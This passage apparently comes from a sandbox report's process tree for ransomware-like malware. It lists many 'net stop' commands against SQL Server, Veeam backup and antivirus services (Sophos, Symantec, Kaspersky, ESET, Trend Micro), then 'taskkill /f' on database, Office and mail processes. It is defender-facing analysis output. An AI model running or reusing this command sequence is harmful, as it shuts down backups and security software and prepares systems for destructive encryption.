C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SYSTEM_BGC /y3⤵PID:2420
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ TPS /y2⤵PID:2428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ TPS /y3⤵PID:2448
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ TPSAMA /y2⤵PID:2456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ TPSAMA /y3⤵PID:2476
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ VEEAMSQL2008R2 /y2⤵PID:2484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2008R2 /y3⤵PID:2504
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ VEEAMSQL2012 /y2⤵PID:2512
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2012 /y3⤵PID:2532
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher /y2⤵PID:2540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y3⤵PID:2560
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ PROFXENGAGEMENT /y2⤵PID:2568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ PROFXENGAGEMENT /y3⤵PID:2588
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ SBSMONITORING /y2⤵PID:2596
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ SBSMONITORING /y3⤵PID:2616
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ SHAREPOINT /y2⤵PID:2624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ SHAREPOINT /y3⤵PID:2644
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ SQL_2008 /y2⤵PID:2652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ SQL_2008 /y3⤵PID:2672
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ SYSTEM_BGC /y2⤵PID:2680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ SYSTEM_BGC /y3⤵PID:2700
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ TPS /y2⤵PID:2708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ TPS /y3⤵PID:2728
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ TPSAMA /y2⤵PID:2736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ TPSAMA /y3⤵PID:2756
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLSERVER /y2⤵PID:2764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵PID:2784
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper100 /y2⤵PID:2792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵PID:2812
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerOLAPService /y2⤵PID:2820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵PID:2840
-
-
-
C:\Windows\SysWOW64\net.exenet stop MySQL80 /y2⤵PID:2848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵PID:2868
-
-
-
C:\Windows\SysWOW64\net.exenet stop MySQL57 /y2⤵PID:2876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:2896
-
-
-
C:\Windows\SysWOW64\net.exenet stop ntrtscan /y2⤵PID:2904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵PID:2924
-
-
-
C:\Windows\SysWOW64\net.exenet stop OracleClientCache80 /y2⤵PID:2932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵PID:2952
-
-
-
C:\Windows\SysWOW64\net.exenet stop PDVFSService /y2⤵PID:2960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:2980
-
-
-
C:\Windows\SysWOW64\net.exenet stop POP3SVC /y2⤵PID:2988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3SVC /y3⤵PID:3008
-
-
-
C:\Windows\SysWOW64\net.exenet stop ReportServer /y2⤵PID:3016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵PID:3036
-
-
-
C:\Windows\SysWOW64\net.exenet stop ReportServer $ SQL_2008 /y2⤵PID:3044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer $ SQL_2008 /y3⤵PID:3064
-
-
-
C:\Windows\SysWOW64\net.exenet stop ReportServer $ SYSTEM_BGC /y2⤵PID:940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer $ SYSTEM_BGC /y3⤵PID:2076
-
-
-
C:\Windows\SysWOW64\net.exenet stop ReportServer $ TPS /y2⤵PID:2084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer $ TPS /y3⤵PID:2112
-
-
-
C:\Windows\SysWOW64\net.exenet stop ReportServer $ TPSAMA /y2⤵PID:2100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer $ TPSAMA /y3⤵PID:2128
-
-
-
C:\Windows\SysWOW64\net.exenet stop RESVC /y2⤵PID:2172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESVC /y3⤵PID:2200
-
-
-
C:\Windows\SysWOW64\net.exenet stop sacsvr /y2⤵PID:2192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵PID:2220
-
-
-
C:\Windows\SysWOW64\net.exenet stop SamSs /y2⤵PID:2244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵PID:2272
-
-
-
C:\Windows\SysWOW64\net.exenet stop SAVAdminService /y2⤵PID:2280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵PID:2308
-
-
-
C:\Windows\SysWOW64\net.exenet stop CABService /y2⤵PID:2296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CABService /y3⤵PID:2324
-
-
-
C:\Windows\SysWOW64\net.exenet stop SDRSVC /y2⤵PID:2368
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵PID:2396
-
-
-
C:\Windows\SysWOW64\net.exenet stop SepMasterService /y2⤵PID:2388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵PID:2416
-
-
-
C:\Windows\SysWOW64\net.exenet stop ShMonitor /y2⤵PID:2440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵PID:2468
-
-
-
C:\Windows\SysWOW64\net.exenet stop Smcinst /y2⤵PID:2476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵PID:2504
-
-
-
C:\Windows\SysWOW64\net.exenet stop SmcService /y2⤵PID:2492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵PID:2520
-
-
-
C:\Windows\SysWOW64\net.exenet stop SMTPSVC /y2⤵PID:2564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSVC /y3⤵PID:2592
-
-
-
C:\Windows\SysWOW64\net.exenet stop SNAC /y2⤵PID:2584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SNAC /y3⤵PID:2612
-
-
-
C:\Windows\SysWOW64\net.exenet stop SntpService /y2⤵PID:2636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exenet stop sophossps /y2⤵PID:2672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵PID:2700
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ BKUPEXEC /y2⤵PID:2688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ BKUPEXEC /y3⤵PID:2716
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ ECWDB2 /y2⤵PID:2760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ ECWDB2 /y3⤵PID:2788
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ PRACTTICEBGC /y2⤵PID:2780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ PRACTTICEBGC /y3⤵PID:2808
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ PRACTTICEMGT /y2⤵PID:2832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ PRACTTICEMGT /y3⤵PID:2860
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ PROFXENGAGEMENT /y2⤵PID:2868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ PROFXENGAGEMENT /y3⤵PID:2896
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SBSMONITORING /y2⤵PID:2884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SBSMONITORING /y3⤵PID:2912
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SHAREPOINT /y2⤵PID:2956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SHAREPOINT /y3⤵PID:2984
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SQL_2008 /y2⤵PID:2976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SQL_2008 /y3⤵PID:3004
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SYSTEM_BGC /y2⤵PID:3028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SYSTEM_BGC /y3⤵PID:3056
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ TPS /y2⤵PID:3064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ TPS /y3⤵PID:2076
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ TPSAMA /y2⤵PID:2056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ TPSAMA /y3⤵PID:2072
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ VEEAMSQL2008R2 /y2⤵PID:2160
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2008R2 /y3⤵PID:2196
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ VEEAMSQL2012 /y2⤵PID:2188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2012 /y3⤵PID:2224
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser /y2⤵PID:2248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵PID:2300
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLSafeOLRService /y2⤵PID:2308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵PID:2324
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLSERVERAGENT /y2⤵PID:2340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵PID:2360
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLTELEMETRY /y2⤵PID:2408
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵PID:2480
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLTELEMETRY $ ECWDB2 /y2⤵PID:2436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY $ ECWDB2 /y3⤵PID:2508
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter /y2⤵PID:2532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵PID:2548
-
-
-
C:\Windows\SysWOW64\net.exenet stop SstpSvc /y2⤵PID:2592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵PID:2612
-
-
-
C:\Windows\SysWOW64\net.exenet stop svcGenericHost /y2⤵PID:2608
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵PID:2644
-
-
-
C:\Windows\SysWOW64\net.exenet stop swi_filter /y2⤵PID:2696
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵PID:2748
-
-
-
C:\Windows\SysWOW64\net.exenet stop swi_service /y2⤵PID:2724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵PID:2776
-
-
-
C:\Windows\SysWOW64\net.exenet stop swi_update_64 /y2⤵PID:2816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵PID:2836
-
-
-
C:\Windows\SysWOW64\net.exenet stop TmCCSF /y2⤵PID:2860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵PID:2896
-
-
-
C:\Windows\SysWOW64\net.exenet stop tmlisten /y2⤵PID:2856
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵PID:2928
-
-
-
C:\Windows\SysWOW64\net.exenet stop TrueKey /y2⤵PID:2980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵PID:2996
-
-
-
C:\Windows\SysWOW64\net.exenet stop TrueKeyScheduler /y2⤵PID:3008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵PID:3024
-
-
-
C:\Windows\SysWOW64\net.exenet stop TrueKeyServiceHelper /y2⤵PID:2052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵PID:2112
-
-
-
C:\Windows\SysWOW64\net.exenet stop UI0Detect /y2⤵PID:2072
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵PID:2196
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamBackupSvc /y2⤵PID:2136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:2228
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamBrokerSvc /y2⤵PID:2304
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:2332
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamCatalogSvc /y2⤵PID:2356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:2384
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamCloudSvc /y2⤵PID:2412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵PID:2500
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamDeploymentService /y2⤵PID:2508
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:2548
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamDeploySvc /y2⤵PID:2520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵PID:2556
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamEnterpriseManagerSvc /y2⤵PID:2692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵PID:2716
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamMountSvc /y2⤵PID:2728
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵PID:2788
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamNFSSvc /y2⤵PID:2812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:2888
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamRESTSvc /y2⤵PID:2896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵PID:2928
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamTransportSvc /y2⤵PID:2944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:2972
-
-
-
C:\Windows\SysWOW64\net.exenet stop W3svc /y2⤵PID:3036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3svc /y3⤵PID:2140
-
-
-
C:\Windows\SysWOW64\net.exenet stop wbengine /y2⤵PID:3052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:2200
-
-
-
C:\Windows\SysWOW64\net.exenet stop WRSVC /y2⤵PID:2224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵PID:2272
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ VEEAMSQL2008R2 /y2⤵PID:2332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2008R2 /y3⤵PID:2384
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ VEEAMSQL2008R2 /y2⤵PID:2396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2008R2 /y3⤵PID:2480
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamHvIntegrationSvc /y2⤵PID:2536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exenet stop swi_update /y2⤵PID:2604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵PID:2660
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ CXDB /y2⤵PID:2752
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ CXDB /y3⤵PID:2804
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ CITRIX_METAFRAME /y2⤵PID:2888
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ CITRIX_METAFRAME /y3⤵PID:2928
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQL /y2⤵PID:2840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQL /y3⤵PID:3004
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ PROD /y2⤵PID:2112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ PROD /y3⤵PID:2108
-
-
-
C:\Windows\SysWOW64\net.exenet stop Zoolz 2 Service /y2⤵PID:2196
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Zoolz 2 Service /y3⤵PID:2216
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper /y2⤵PID:2424
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵PID:2500
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ PROD /y2⤵PID:2480
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ PROD /y3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exenet stop msftesql $ PROD /y2⤵PID:2588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql $ PROD /y3⤵PID:2676
-
-
-
C:\Windows\SysWOW64\net.exenet stop NetMsmqActivator /y2⤵PID:2900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵PID:2940
-
-
-
C:\Windows\SysWOW64\net.exenet stop EhttpSrv /y2⤵PID:2920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵PID:3012
-
-
-
C:\Windows\SysWOW64\net.exenet stop ekrn /y2⤵PID:3056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵PID:2324
-
-
-
C:\Windows\SysWOW64\net.exenet stop ESHASRV /y2⤵PID:2216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵PID:2500
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SOPHOS /y2⤵PID:2384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SOPHOS /y3⤵PID:2464
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SOPHOS /y2⤵PID:2776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SOPHOS /y3⤵PID:2928
-
-
-
C:\Windows\SysWOW64\net.exenet stop AVP /y2⤵PID:2912
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵PID:3004
-
-
-
C:\Windows\SysWOW64\net.exenet stop klnagent /y2⤵PID:2156
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:2392
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SQLEXPRESS /y2⤵PID:2500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SQLEXPRESS /y3⤵PID:2464
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent /y2⤵PID:2612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent /y3⤵PID:2716
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLEXPRESS /y2⤵PID:2972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLEXPRESS /y3⤵PID:2252
-
-
-
C:\Windows\SysWOW64\net.exenet stop wbengine /y2⤵PID:2108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:2660
-
-
-
C:\Windows\SysWOW64\net.exenet stop kavfsslp /y2⤵PID:2928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:3032
-
-
-
C:\Windows\SysWOW64\net.exenet stop KAVFSGT /y2⤵PID:2252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:2660
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zoolz.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:2664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im agntsvc.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:2556
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dbeng50.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:2940
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dbsnmp.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im encsvc.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im firefoxconfig.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3112
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Infopath.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3136
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im isqlplussvc.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3160
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msaccess.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3184
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msftesql.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mspub.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mydesktopqos.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mydesktopservice.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3280
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mysqld.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mysqld-nt.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3332
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mysqld-opt.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3356
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ocautoupds.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ocomm.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3404
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ocssd.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3452
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3500
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powerpnt.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqbcoreservice.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlagent.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlbrowser.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlservr.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3620
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlwriter.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3644
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im steam.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im synctime.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tbirdconfig.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3716
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thebat.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thebat64.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3788
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im visio.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3812
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im xfssvccon.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tmlisten.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im PccNTMon.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CNTAoSMgr.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Ntrtscan.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:3980
-
-
